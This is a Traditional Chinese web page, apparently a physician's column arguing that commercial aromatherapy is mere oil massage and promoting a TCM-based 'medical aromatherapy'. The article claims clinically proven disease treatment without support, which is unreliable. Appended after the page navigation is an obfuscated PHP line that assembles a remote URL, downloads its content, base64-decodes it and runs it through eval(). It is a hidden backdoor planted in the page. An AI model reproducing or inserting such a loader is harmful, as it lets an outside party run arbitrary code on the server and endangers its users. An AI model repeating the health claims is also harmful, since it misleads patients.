收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 醫學芳療的定位
醫學芳療的定位 列印 E-mail
        經過多年觀察,我發現坊間許多號稱芳療中心所實施的芳香療法,只能稱之為油壓(Oil Massage)。

油壓可能有其效果,因為即使不用任何精油而純粹按摩,對某些患者也具有舒緩的感覺,但是坊間不易精準地擷取到芳療真正在醫學臨床治療上的重點(The Key Point of the Medical Aroma Therapy)。

我們以中醫五行與經脈理論,加上西醫科學理論,調配出許多可改善疾病症狀與治療疾病的精油,經過數年臨床經驗證實其療效,才有資格稱為醫學芳香療法(Medical Aroma Therapy)。

        許多人花費數萬甚至數十萬上了一堆課程、獲得證書,雖然看起來學習內容很多,但多是為了行銷包裝自己而設計的課程,無法真正呈現芳香療法的精髓;且因所學不易掌握芳香療法的理論與精神,還造成人們對芳香療法的誤解。

這也是為何現在我們致力於在醫學界推廣、並廣設教育訓練課程,與真正想要進入芳香療法一窺其貌的醫學先進們,分享芳香療法神奇與奧妙的原因。如果能將芳香療法運用在臨床醫學上,做為主流醫學的輔助療法,解決患者的痛苦,將是病患之喜;若再訓練非醫師能夠結合中醫經脈、五行理論來活用芳香療法,不但沒有觸法之虞,亦是消費者之福。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));